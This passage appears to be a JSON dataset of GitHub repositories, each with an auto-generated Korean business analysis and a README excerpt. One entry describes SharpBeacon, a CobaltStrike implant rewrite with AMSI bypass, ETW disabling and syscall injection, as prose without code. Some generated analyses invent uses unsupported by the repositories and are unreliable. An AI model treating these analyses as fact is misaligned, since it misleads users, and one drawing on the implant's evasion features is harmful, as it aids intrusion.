depends on CobaltStrike.   -- bopin2020 \n\n<br>\n关于使用syscall注入的问题 bopin2020师傅在win11测试calc.exe 创建线程没有成功；其他notepad,powershell都没有问题。感谢 bopin2020 师傅。\n<br>\n\n---\n# SharpBeacon\nCobaltStrike Beacon written in .Net 4  用.net重写了stager及Beacon，其中包括正常上线、文件管理、进程管理、令牌管理、结合SysCall进行注入、原生端口转发、关ETW等一系列功能\n\n# 一、概述\n这次我们一起用C#来重写stager及其Beacon中的大部分常用功能，帖子主要介绍该项目的运行原理（LolBins->Stager->Beacon）及相应的功能介绍及展示。LolBins部分是由GadgetToJs使Stager转换为js、vba、hta文件后，再结合相应的csript、mshta等程序来运行；Stager功能包括从网络中拉取Beacon的程序集并在内存中加载及AMSIBypass；Beacon部分主要有包括正常上线、文件管理、进程管理、令牌管理、结合SysCall进行注入、原","composite_score":0.506,"license_safety_tag":"unknown"},{"name":"fossasia/susi_linux","github_url":"https://github.com/fossasia/susi_linux","stars":12,"language":"Python","license":"Apache-2.0","abandonment_months":63,"description":"# SUSI Linux 저장소 분석\n\n## 왜 보물인가\n음성으로 컴퓨터를 제어할 수 있는 오픈소스 인공지능 플랫폼으로, 누구나 자유롭게 사용하고 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 제어 서비스**: 음성으로 조명, 온도, 보안시스템을 관리하는 가정용 자동화 플랫폼\n2. **기업 내부 도구**: 직원들이 음성 명령으로 회의실 예","readme_excerpt":"# SUSI.AI on Linux\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/167b701c744841c5a05269d06b863732)](https://app.codacy.com/app/fossasia/susi_linux?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi_linux&utm_campaign=badger)\n[![Build Status](https://travis-ci.org/fossasia/susi_linux.svg?branch=master)](https://travis-ci.org/fossasia/susi_linux)\n[![Join the chat at https://gitter.im/fossasia/susi_hardware](https://badges.gitter.im/fossasia/susi_hardware.svg)](https://gitter.im/fossasia/susi_hardware?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/susiai_.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/susiai_)\n\nThis repository contains components to run SUSI.AI on the desktop or a headless smart speaker together with the [SUSI.AI Server](https://github.com/fossasia/susi_server). Functionalities implemented here include using the microph","composite_score":0.506,"license_safety_tag":"safe"},{"name":"ckkelvinchan/RealBasicVSR","github_url":"https://github.com/ckkelvinchan/RealBasicVSR","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":36,"description":"# RealBasicVSR 상용화 분석\n\n## 왜 보물인가\n흐릿하거나 손상된 영상을 선명하게 복원하는 기술로, 아카이브 영상 복구부터 영상 스트리밍 품질 개선까지 광범위하게 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **영상 복원 SaaS 서비스**: 구글 포토처럼 오래된 가족 영상이나 추억 영상을 자동으로 선명하게 복원해주는 웹 애플리케이션\n2","readme_excerpt":"# RealBasicVSR (CVPR 2022)\n\n\\[[Paper](https://arxiv.org/pdf/2111.12704.pdf)\\]\n\nThis is the official repository of \"Investigating Tradeoffs in Real-World Video Super-Resolution, arXiv\". This repository contains *codes*, *colab*, *video demos* of our work.\n\n**Authors**: [Kelvin C.K. Chan](https://ckkelvinchan.github.io/), [Shangchen Zhou](https://shangchenzhou.com/), [Xiangyu Xu](https://sites.google.com/view/xiangyuxu), [Chen Change Loy](https://www.mmlab-ntu.com/person/ccloy/), *Nanyang Technological University*\n\n**Acknowedgement**: Our work is built upon [MMEditing](https://github.com/open-mmlab/mmediting). The code will also appear in MMEditing soon. Please follow and star this repository and MMEditing!\n\n**Feel free to ask questions. I am currently working on some other stuff but will try my best to reply. If you are also interested in [BasicVSR++](https://github.com/ckkelvinchan/BasicVSR_PlusPlus), which is also accepted to CVPR 2022, please don't hesitate to star!** \n\n\n\n\n## News\n- ","composite_score":0.506,"license_safety_tag":"safe"},{"name":"ksoclabs/awesome-kubernetes-security","github_url":"https://github.com/ksoclabs/awesome-kubernetes-security","stars":31,"language":"","license":"unknown","abandonment_months":30,"description":"# ksoclabs/awesome-kubernetes-security 분석\n\n## 왜 보물인가\n클라우드 서버 보안의 모든 정보를 한곳에 모아놓은 참고서로, 기업의 중요한 데이터를 지키는 데 필요한 방법들을 체계적으로 정리해두었습니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 보안 진단 SaaS**: 기업들이 자신의 서버 보안 수준을 자동으로 평가해주는 웹","readme_excerpt":"# :lock: awesome-kubernetes-security [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n\nA curated list of awesome Kubernetes security resources. Can you dig it?\n\n## Open Source Projects\n\n- [aad-pod-identity](https://github.com/Azure/aad-pod-identity/) -  Assign Azure AD idenitites to pods in Kubernetes, in order to access Azure resources\n- [audit2rbac](https://github.com/liggitt/audit2rbac) - Autogenerate RBAC policies based on Kubernetes audit logs\n- [CDK](https://github.com/cdk-team/CDK) - Zero Dependency Container Penetration Toolkit\n- [Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper) - Apache v2, powerful runtime vulnerability scanner for kubernetes, virtual machines and serverless\n- [cnspec](https://cnspec.io) - Scan Kubernetes clusters, containers, and manifest files for vulnerabilities and misconfigurations\n- [falco](https://github.com/falcosecurity/falco) - Container Native Runtime Security\n- [KBOM](https://github.com/ksoclabs/kbom) - Kubernetes B","composite_score":0.506,"license_safety_tag":"unknown"},{"name":"dqzg12300/unidbg_tools","github_url":"https://github.com/dqzg12300/unidbg_tools","stars":5,"language":"Java","license":"Apache-2.0","abandonment_months":51,"description":"# unidbg_tools 상용화 분석\n\n## 왜 보물인가\n스마트폰 앱의 보안을 테스트하고 문제를 찾아내는 전문가용 도구로, 보안 컨설팅 업계에서 실질적인 수익 창출이 가능한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 검사 SaaS 플랫폼**: 기업의 모바일 앱 보안 상태를 자동으로 진단해주는 웹 서비스\n2. **컨설팅사 내부 도구**: 보","readme_excerpt":"# unidbg\n## 本项目主要是使用unidbg解决一些问题时的案例记录\n\n### 1、ollvm bcf混淆解决的例子unidbg_tools/unidbg-android/src/test/java/com/ollvm/BcfTest.java\n\n### 2、ollvm fla混淆解决的例子unidbg_tools/unidbg-android/src/test/java/com/ollvm/FlaTest.java\n\n### 3、ollvm str混淆解决的例子unidbg_tools/unidbg-android/src/test/java/com/ollvm/DestrTest.java\n\n### 4、trace打印寄存器每一步的变化流程的例子unidbg_tools/unidbg-android/src/test/java/com/tracedemo/TraceTest.java\n\ntrace打印效果如下\n~~~\n[libnative-lib.so] [0x124cc] [ fd 7b bf a9 ] 0x400124cc: stp x29, x30, [sp, #-0x10]!-----x29=0xbffff770\tx30=0x400135f8\tsp=0xbffff6c0\t\t//x29=0xbffff770\n[libnative-lib.so] [0x124d0] [ fd 03 00 91 ] 0x400124d0: mov x29, sp-----x29=0xbffff770\tsp=0xbffff6b0\t\t//x29=0xbffff6b0\n[libnative-lib.so] [0x124d4] [ ff c3 00 d1 ] 0x400124d4: sub sp, sp, #0x30-----sp=0xbffff6b0\t\t//sp=0xbffff680\n[libnative-lib.so] [0x124d8] [ a9 01 00 d0 ] 0x400124d8: adrp x9, #0x40048000-----x9=0x0\t\t//x9=0x40048000\n[libnative-lib.so] [0x124dc] [ 29 21 46 f9 ] 0x400124dc: ldr x9, [x9, #0xc40]-----x9=0x40048","composite_score":0.506,"license_safety_tag":"safe"},{"name":"WeeJeWel/wg-easy","github_url":"https://github.com/WeeJeWel/wg-easy","stars":6,"language":"","license":"NOASSERTION","abandonment_months":26,"description":"# WeeJeWel/wg-easy 분석 리포트\n\n## 왜 보물인가\n복잡한 네트워크 보안 설정을 웹 화면에서 클릭만으로 간단하게 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 회사의 원격 근무 직원들이 안전하게 회사 네트워크에 접속할 수 있는 구독 서비스\n2. **내부 업무 도구**: 중소 IT 팀이 자사 서버","readme_excerpt":"# WireGuard Easy\n\n[![Build & Publish Docker Image to Docker Hub](https://github.com/wg-easy/wg-easy/actions/workflows/deploy.yml/badge.svg?branch=production)](https://github.com/wg-easy/wg-easy/actions/workflows/deploy.yml)\n[![Lint](https://github.com/wg-easy/wg-easy/actions/workflows/lint.yml/badge.svg?branch=master)](https://github.com/wg-easy/wg-easy/actions/workflows/lint.yml)\n![Docker](https://img.shields.io/docker/pulls/weejewel/wg-easy.svg)\n[![Sponsor](https://img.shields.io/github/sponsors/weejewel)](https://github.com/sponsors/WeeJeWel)\n![GitHub Stars](https://img.shields.io/github/stars/wg-easy/wg-easy)\n\nYou have found the easiest way to install & manage WireGuard on any Linux host!\n\n<p align=\"center\">\n  <img src=\"./assets/screenshot.png\" width=\"802\" />\n</p>\n\n## Features\n\n* All-in-one: WireGuard + Web UI.\n* Easy installation, simple to use.\n* List, create, edit, delete, enable & disable clients.\n* Show a client's QR code.\n* Download a client's configuration file.\n* Statistics","composite_score":0.506,"license_safety_tag":"unknown"},{"name":"Lux-AI-Challenge/Lux-Design-2021","github_url":"https://github.com/Lux-AI-Challenge/Lux-Design-2021","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":47,"description":"# Lux-AI-Challenge/Lux-Design-2021 평가\n\n## 왜 보물인가\nAI를 활용해 게임 맵을 자동으로 설계하는 기술로, 게임 개발사들이 수개월 걸리던 맵 제작 작업을 며칠로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 게임 개발사들이 구독하는 AI 맵 생성 플랫폼으로 운영\n- **API 판매**: 게임 엔","readme_excerpt":"# Lux AI Challenge: Season 1\n\nThe night is dark and full of terrors. Two teams must fight off the darkness, collect resources, and advance through the ages. Daytime finds a desperate rush to gather and build the resources that can carry you through the impending night. Plan and expand carefully -- any city that fails to produce enough light will be consumed by darkness.\n\nWelcome to the Lux AI Challenge Season 1!\n\n<img src=\"./assets/daynightshift.gif\" style=\"width:50%\" />\n\nThe Lux AI Challenge is a competition where competitors design agents to tackle a multi-variable optimization, resource gathering, and allocation problem in a 1v1 scenario against other competitors. In addition to optimization, successful agents must be capable of analyzing their opponents and developing appropriate policies to get the upper hand.\n\nTo get started, go to our [Getting Started](#getting-started) section. The competition runs until December 6th 2021 and submissions are due at 11:59PM UTC on the competitio","composite_score":0.506,"license_safety_tag":"safe"},{"name":"openshift/openshift-restclient-python","github_url":"https://github.com/openshift/openshift-restclient-python","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":35,"description":"# OpenShift REST Client Python 분석\n\n## 왜 보물인가\n클라우드 서비스 운영 시스템(OpenShift)을 프로그래밍으로 자동 제어할 수 있게 해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 자동화 서비스**: 기업의 서버 자동 배포·관리를 위한 SaaS 플랫폼\n2. **내부 DevOps 도구**: 개발팀","readme_excerpt":"OpenShift python client\n======================\n\n[![Build Status](https://travis-ci.com/openshift/openshift-restclient-python.svg?branch=master)](https://travis-ci.com/openshift/openshift-restclient-python)\n[![Coverage Status](https://coveralls.io/repos/github/openshift/openshift-restclient-python/badge.svg?branch=master)](https://coveralls.io/github/openshift/openshift-restclient-python?branch=master)\n\nPython client for the [Kubernetes](https://kubernetes.io/) and [OpenShift](http://openshift.redhat.com/) APIs.\n\nThere are two ways this project interacts with the Kubernetes and OpenShift APIs.\nThe first, **now deprecated**, is to use models and functions generated with\nswagger from the API spec. The second, new approach, is to use a single model\nand client to generically interact with all resources on the server. The\ndynamic client also works with resources that are defined by aggregated\nAPI servers or Custom Resource Definitions.\n\n# Table of Contents\n\n* [Installation](#installation)\n* ","composite_score":0.5059,"license_safety_tag":"safe"},{"name":"logancyang/my-cs-degree","github_url":"https://github.com/logancyang/my-cs-degree","stars":17,"language":"","license":"unknown","abandonment_months":60,"description":"# logancyang/my-cs-degree 분석\n\n## 왜 보물인가\n컴퓨터 과학 학위 과정을 온라인으로 무료로 배울 수 있는 체계적인 커리큘럼 모음으로, 대학 등록금 없이 전문가 수준의 기술을 습득하려는 사람들의 수요가 매우 높습니다.\n\n## 어디에 쓸 수 있나\n**1. 온라인 교육 플랫폼 (SaaS)**: 이 커리큘럼을 기반으로 진도 추적, 퀴즈, 인","readme_excerpt":"# My CS Degree - Full-Stack ML Engineering (2020)\n\nBeing a machine learning software engineer with a background in Physics, I felt the lack of a CS degree had been a limiting factor in my long-term growth. To tackle it head-on, I designed this curriculum for myself with the best resources I found online, focusing on CS basics as well as full-stack development, deep learning and natural language processing.\n\nThere are general knowledge courses and project courses.\n\n**General knowledge courses** are for indexing knowledge in the brain into an organized system. When facing a new problem, at least you know what relevant info to look for.\n\n**Project courses** are the real learning process. Learning by doing is the only way to learn.\n\nIf you are interested in the philosophy of the creation of this curriculum, I wrote an article about it:\n\n[How I Designed My Own Full-Stack ML Engineering Degree](https://towardsdatascience.com/how-i-designed-my-own-full-stack-ml-engineering-degree-297a31e3a3b2","composite_score":0.5059,"license_safety_tag":"unknown"},{"name":"owl4ce/dotfiles","github_url":"https://github.com/owl4ce/dotfiles","stars":5,"language":"CSS","license":"GPL-3.0","abandonment_months":44,"description":"# owl4ce/dotfiles 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터를 쓰는 사람들이 자신의 작업 환경을 한 번에 설정할 수 있도록 정리한 설정 파일 모음으로, 반복적인 초기 설정 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 온보딩 플랫폼**: 새로운 팀원들이 입사할 때 한 번에 작업 환경을 자동으로 설정해주는 SaaS 서","readme_excerpt":"<div align=\"justify\">\n\n<div align=\"center\">\n\n```ocaml\nNEVER SKIP / IGNORE / AVOID README\n```\n\n```css\n      __/)   ‌‌‌‌‬‬‬‍ ‌‌‌‌‌‬‌‌   ‌‌‌‌‌﻿‌‬ ‌‌‌‌‌﻿‌‌‌‌‌‌‌﻿‌‬        ‌‌‌‌‌﻿‌‬_      ‌‌‌‌‌‬‌‌_       ‌‌‌‌‍‬﻿﻿  ‌‌‌‌‍﻿‍﻿ \n   .‌‌‌‌‍‬﻿‌-(_‌‌‌‌‌﻿‍‌_(=:   |   ‌‌‌‌‍‬‌﻿   ‌‌‌‌‍‬‍‍   ‌‌‌‌‌‬‌‌ | | o  | |     ‌‌‌‌‌﻿﻿‌    \n‌‌‌‌‍‬‌‍|\\ |    \\) ‌‌‌‌‍‬﻿‌ _‌‌‌‌‍﻿‍‌_| ‌‌‌‌‍‬‍‍  __ ‌‌‌‌‍﻿‌‬_|‌‌‌‌‍‬﻿‬_ | |‌‌‌‌‍‬‌‍    |‌‌‌‌‍﻿‍‌ |  _ ‌‌‌‌‍‬‍‍  , ‌‌‌‌‌‬﻿‍ \n‌‌‌‌‍﻿‌﻿\\‌‌‌‌‍‬‍‍ ||       / ‌‌‌‌‌﻿‍﻿ ‌‌‌‌‍‬‍‍|  /  \\_|  |/‌‌‌‌‍‬﻿‬  |  |/  |/  / \\‌‌‌‌‍‌‌‌‌‌‌‌‍﻿‌‌_\n \\||     ‌‌‌‌‍‬﻿‍  \\_/|_/\\__/ |_‌‌‌‌‌‬﻿‬/‌‌‌‌‍‬﻿‍|__/|_‌‌‌‌‍‬‍‍/|__/‌‌‌‌‌﻿﻿‬|__/ \\/ \n  \\|                     |\\                 \n   |  6F 77 6C 34 63 65  |/  with aesthetics\n```\n\n</div>\n\n<pre align=\"center\">\n<a href=\"#seedling--setup\">SETUP</a> • <a href=\"#four_leaf_clover--key-bindings\">KEYBINDS</a> • <a href=\"https://deviantart.com/owl4ce/art/Sakura-Saber-872360153\">GALLERY</a> • <a href=\"#herb--guides\">GUIDES</a>\n</pre>\n\n<h1>\n  <a href=\"#--------\">\n    <i","composite_score":0.5059,"license_safety_tag":"restricted"},{"name":"Youlor/Youpk","github_url":"https://github.com/Youlor/Youpk","stars":13,"language":"","license":"unknown","abandonment_months":56,"description":"# Youlor/Youpk 프로젝트 분석\n\n## 왜 보물인가\n정보가 거의 공개되지 않아 프로젝트의 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자 인증 시스템이 필요한 웹 서비스의 백엔드 기능으로 활용\n- **내부 업무 도구**: 기업의 직원 관리나 접근 권한 제어 시스템으로 도입\n- **API 판매**: 개","readme_excerpt":"# Youpk: 又一款基于ART的主动调用的脱壳机\n## 已开源\n预祝大家儿童节快乐\n仓库地址: https://github.com/youlor/unpacker, 欢迎各位大佬star.\n\n## 原理\n\nYoupk是一款针对Dex整体加固+各式各样的Dex抽取的脱壳机\n\n基本流程如下:\n\n1. 从内存中dump DEX\n2. 构造完整调用链, 主动调用所有方法并dump CodeItem\n3. 合并 DEX, CodeItem\n\n### 从内存中dump DEX\n\nDEX文件在art虚拟机中使用DexFile对象表示, 而ClassLinker中引用了这些对象, 因此可以采用从ClassLinker中遍历DexFile对象并dump的方式来获取.\n\n```c++\n//unpacker.cc\nstd::list<const DexFile*> Unpacker::getDexFiles() {\n  std::list<const DexFile*> dex_files;\n  Thread* const self = Thread::Current();\n  ClassLinker* class_linker = Runtime::Current()->GetClassLinker();\n  ReaderMutexLock mu(self, *class_linker->DexLock());\n  const std::list<ClassLinker::DexCacheData>& dex_caches = class_linker->GetDexCachesData();\n  for (auto it = dex_caches.begin(); it != dex_caches.end(); ++it) {\n    ClassLinker::DexCacheData data = *it;\n    const DexFile* dex_file = data.dex_file;\n    dex_files.push_back(dex_file);\n  }\n  return dex_files;\n}\n```\n\n另外, 为了避免dex做任何形式的优化影响dump下来的dex文件, 在dex2oat中设置 CompilerFilter 为仅验证\n\n```c++\n/","composite_score":0.5059,"license_safety_tag":"unknown"},{"name":"baianat/builder","github_url":"https://github.com/baianat/builder","stars":22,"language":"JavaScript","license":"MIT","abandonment_months":42,"description":"# baianat/builder 분석 리포트\n\n## 왜 보물인가\n누구나 코딩 없이 웹사이트나 애플리케이션을 직관적으로 만들 수 있는 시각적 빌더 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 웹사이트를 직접 만들고 관리할 수 있는 구독형 플랫폼\n2. **내부 업무 도구**: 대기업의 IT팀이 직원들을 위한 업무용 화면","readme_excerpt":"# Vuse\n\n<p align=\"center\">\n  <a href=\"https://github.com/baianat/vuse\" target=\"_blank\">\n    <img width=\"450\" src=\"https://github.com/baianat/vuse/blob/master/Logo/Vuse_Logo_Horizontal_Gradient.png\">\n  </a>\n</p>\n\n> Logo by [chimzycash](https://github.com/chimzycash)\n\n**WIP: Vuse active development is now halted.**\n\nAdvanced page/email builder based on [Vue.js](https://vuejs.org/).\n\n[documentation](https://baianat.github.io/vuse/)\n\n## Credits\n\n- Logo by [chimzycash](https://github.com/chimzycash).\n\n## License\n\nMIT\n","composite_score":0.5059,"license_safety_tag":"safe"},{"name":"Ramotion/fluid-slider-android","github_url":"https://github.com/Ramotion/fluid-slider-android","stars":9,"language":"Kotlin","license":"MIT","abandonment_months":72,"description":"# Fluid Slider Android 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱에서 부드럽고 세련된 슬라이더 UI를 쉽게 만들 수 있는 기성 도구라서, 앱 개발사들이 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악·동영상 스트리밍 앱 SaaS**: Spotify나 Netflix 같은 서비스에서 재생 진행률 조절 UI로","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=fluid-slider-android\"><img src=\"https://github.com/Ramotion/folding-cell/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/fluid-slider-android\">\n<img align=\"left\" src=\"https://github.com/Ramotion/fluid-slider-android/blob/master/Fluid_slider.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">FLUID SLIDER [KOTLIN]</h1></p>\n\n<h4>A slider widget with a popup bubble displaying the precise value selected</h4>\n\n\n___\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=fluid-slider-android\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img src=\"https://i.imgur","composite_score":0.5059,"license_safety_tag":"safe"},{"name":"4paradigm/AutoX","github_url":"https://github.com/4paradigm/AutoX","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":40,"description":"# AutoX 프로젝트 평가\n\n## 왜 보물인가\n복잡한 데이터 분석 작업을 자동으로 처리해주는 도구로, 전문가 없이도 데이터 기반 의사결정을 할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 고객들이 월 구독료를 내고 자신의 데이터를 자동 분석하는 웹 서비스\n- **내부 업무 도구**: 대기업의 마케팅팀이 고객 데이","readme_excerpt":"[English](./README_EN.md) | 简体中文\n<img src=\"./img/logo.png\" width = \"1500\" alt=\"logo\" align=center />\n\n# AutoX是什么？\nAutoX一个高效的自动化机器学习工具。\n它的特点包括:\n- 效果出色: AutoX在多个kaggle数据集上，效果显著优于其他解决方案(见[效果对比](#效果对比))。\n- 简单易用: AutoX的接口和sklearn类似，方便上手使用。\n- 通用: 适用于分类和回归问题。\n- 自动化: 无需人工干预，全自动的数据清洗、特征工程、模型调参等步骤。\n- 灵活性: 各组件解耦合，能单独使用，对于自动机器学习效果不满意的地方，可以结合专家知识，AutoX提供灵活的接口。\n- 比赛上分点总结：整理并公开历史比赛的上分点。\n\n# AutoX包含什么内容\n- [autox_competition](autox/autox_competition/README.md): 主要针对于表格类型的数据挖掘竞赛\n- [autox_server](autox/autox_server/README.md): 用于上线部署的automl服务\n- [autox_interpreter](autox/autox_interpreter/README.md): 机器学习可解释功能\n- [autox_nlp](autox/autox_nlp/README.md): 对文本列进行处理的自动化工具\n- [autox_recommend](autox/autox_recommend/README.md): 推荐系统的自动机器学习\n- [autox_video](autox/autox_video/README.md): 应用于视频分类任务的自动机器学习框架\n\n# 加入社区\n<img src=\"./img/qr_code_community.png\" width = \"200\" height = \"260\" alt=\"AutoX社区\" align=center />\n\n# 框架\n## autox_competition\n<img src=\"./autox/autox_competition/img/framework.png\" alt=\"autox_competition fram","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"Socialbird-AILab/BERT-Classification-Tutorial","github_url":"https://github.com/Socialbird-AILab/BERT-Classification-Tutorial","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":91,"description":"# BERT-Classification-Tutorial 상용화 분석\n\n## 왜 보물인가\n글이나 문서를 자동으로 분류해주는 AI 기술의 실무 활용법을 배울 수 있어, 텍스트 데이터를 다루는 기업들에게 즉시 적용 가능한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 피드백을 자동으로 분류하고 분석해주는 웹 서비스 (만족도/불만족도 ","readme_excerpt":"# BERT-Classification-Tutorial\n标注数据，可以说是AI模型训练里最艰巨的一项工作了。自然语言处理的数据标注更是需要投入大量人力。相对计算机视觉的图像标注，文本的标注通常没有准确的标准答案，对句子理解也是因人而异，让这项工作更是难上加难。\n但是！谷歌最近发布的BERT大大的解决了这个问题！根据我们的实验，BERT在文本多分类的任务中，能在极小的数据下，带来显著的分类准确率提升。并且，实验主要对比的是仅仅5个月前发布的State of the art 语言模型迁移学习模型 - ULMFiT (https://arxiv.org/abs/1801.06146)， 结果有着明显的提升。\n\n![alt text](https://github.com/Socialbird-AILab/BERT-Classification-Tutorial/blob/master/pictures/Results.png)\n\n从上图我们可以看出，在不同的数据集中，BERT都有非常出色的表现。我们用的实验数据分为1000、 6700 和 12000 条，并且各自包含了测试数据，训练测试分割为80%-20%。数据集从多个网页来源获得，并经过了一系列的分类映射。但Noisy数据集带有较为显著的噪音，抽样统计显示噪音比例在20%左右。实验对比了几个模型，从最基础的卷积网络作为Baseline，到卷积网络加上传统的词向量Glove embedding， 然后是ULMFiT和BERT。\n\n\n# 1.运行环境\nTensorflow版本为Windows 1.10.0 GPU，具体安装教程可以参考此链接https://www.tensorflow.org/install/pip?lang=python3。Anaconda 版本为1.9.2 。\n\n# 2.硬件配置\n实验用的机器显卡为NVIDIA GeoForce GTX 1080 Ti，BERT base 模型占用显存约为9.5G。\n\n# 3.下载模型\n所有的运行环境设置好后，在这里可以下载到我们实验用的BERT base: https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip\n 下载完后，放在 BERT_BASE_DIR","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"gothinkster/elixir-phoenix-realworld-example-app","github_url":"https://github.com/gothinkster/elixir-phoenix-realworld-example-app","stars":8,"language":"Elixir","license":"MIT","abandonment_months":46,"description":"# Elixir Phoenix Realworld Example App 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르고 안정적으로 만들 수 있는 검증된 기술 기반으로, 이미 완성된 예제 코드가 있어서 처음부터 다시 개발할 필요가 없습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 소셜 미디어 플랫폼 SaaS**\n블로그, 게시판, 팔로우 기능이 내장된 이 코드를","readme_excerpt":"# ![RealWorld Example App](logo.png)\n> Elixir (Phoenix) codebase containing real world examples (CRUD, auth, advanced patterns, etc) that adheres to the [RealWorld](https://github.com/gothinkster/realworld-example-apps) spec and API.  \n\n[![CircleCI](https://circleci.com/gh/gothinkster/elixir-phoenix-realworld-example-app.svg?style=svg)](https://circleci.com/gh/gothinkster/elixir-phoenix-realworld-example-app) [![codecov](https://codecov.io/gh/gothinkster/elixir-phoenix-realworld-example-app/branch/master/graph/badge.svg)](https://codecov.io/gh/gothinkster/elixir-phoenix-realworld-example-app)\n\nThis codebase was created to demonstrate a fully fledged backend application built with **Elixir and Phoenix** including CRUD operations, authentication, routing, pagination, and more.\n\nWe've gone to great lengths to adhere to the **[credo](https://github.com/rrrene/credo)** community styleguides & best practices.\n\nFor more information on how to this works with other frontends/backends, head over","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"atomiks/floating-ui","github_url":"https://github.com/atomiks/floating-ui","stars":244,"language":"JavaScript","license":"MIT","abandonment_months":54,"description":"# Floating UI 저장소 분석\n\n## 왜 보물인가\n웹사이트의 드롭다운 메뉴, 툴팁, 팝업 같은 떠있는 요소들을 완벽하게 배치해주는 필수 도구로, 수천 개의 웹서비스가 필요로 하는 핵심 기술입니다.\n\n## 어디에 �used 수 있나\n- **SaaS 서비스**: 고객 관리 프로그램(CRM)이나 협업 도구에서 알림, 드롭다운, 팝업을 안정적으로 표시\n- ","readme_excerpt":"# Floating UI has moved to the original Popper repo and is now its new brand. Go there!\n\nLink: https://github.com/floating-ui/floating-ui/\n","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"Flaque/merchant.js","github_url":"https://github.com/Flaque/merchant.js","stars":233,"language":"JavaScript","license":"MIT","abandonment_months":97,"description":"# Merchant.js 상용화 분석\n\n## 왜 보물인가\n온라인 결제를 간단하게 처리할 수 있게 해주는 기술로, 쇼핑몰이나 구독 서비스를 운영하는 사람들이 복잡한 결제 시스템 없이도 돈을 받을 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **소규모 SaaS 서비스**: 월간 구독료를 자동으로 징수하는 구독형 소프트웨어 플랫폼\n- **내부 업무 도구**: 회","readme_excerpt":"# 💰 Merchant.js 💰\n\nMerchant is a system for creating programs that manage changing numbers over\ntime. It's especially useful for creating idle games (sometimes called\nincremental games), but could potentially be used in other games or programs.\n\nIf you're not sure what an idle game is, [click here to find out](http://www.decisionproblem.com/paperclips/index2.html). Note: If you're trying to be productive right now, that link may not be for you.\n\nMerchant works well with Redux, but doesn't require it. Functions return copies and don't\nmodify state. Since Merchant is built on `immutable`, most of it's key concepts\nare stored as immutable objects.\n\nTo be frank, Merchant is really just a collection of patterns with some helpful functions. It's fairly minimalistic but also gives you a good amount of power without sacrificing efficiency.\n\n[Docs here.](https://flaque.github.io/merchant.js/)\n\n[Live example here.](https://merchant-example.now.sh/) 🐶\n\n# Installation\n\nWith yarn:\n\n```sh\nyarn add m","composite_score":0.5058,"license_safety_tag":"safe"},{"name":"yarrick/pingfs","github_url":"https://github.com/yarrick/pingfs","stars":11,"language":"C","license":"ISC","abandonment_months":34,"description":"# PingFS 상용화 분석\n\n## 왜 보물인가\n인터넷 신호를 마치 컴퓨터의 저장 공간처럼 사용할 수 있는 기발한 기술로, 기존에는 불가능했던 새로운 방식의 데이터 저장이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **임시 데이터 저장 SaaS**: 빠른 속도가 필요한 임시 캐시 서비스로, 개발자들이 자신의 애플리케이션에 붙여 쓸 수 있는 구독형 서비스","readme_excerpt":"pingfs - \"True cloud storage\"\n\tby Erik Ekman <erik@kryo.se>\n\npingfs is a filesystem where the data is stored only in the Internet itself,\nas ICMP Echo packets (pings) travelling from you to remote servers and\nback again.\n\nIt is implemented using raw sockets and FUSE, so superuser powers are required.\nLinux is the only intended target OS, portability is not a goal.\nBoth IPv4 and IPv6 remote hosts are supported.\n\nCompile by just running 'make'\n\nHow to start it:\n- Create a textfile with hostname and IP addresses to target\n- As root, run ./pingfs <filename> <mountpoint>\n  It will resolve all hostnames, and then test each resolved address\n  if it responds properly to a number of pings.\n  Some statistics will be printed and then the filesystem will be mounted.\n- Pingfs will stay in the foreground and print stats on packets and bytes\n  each second.\n\nHow to stop it:\n- Stop with ^C, and it should unmount 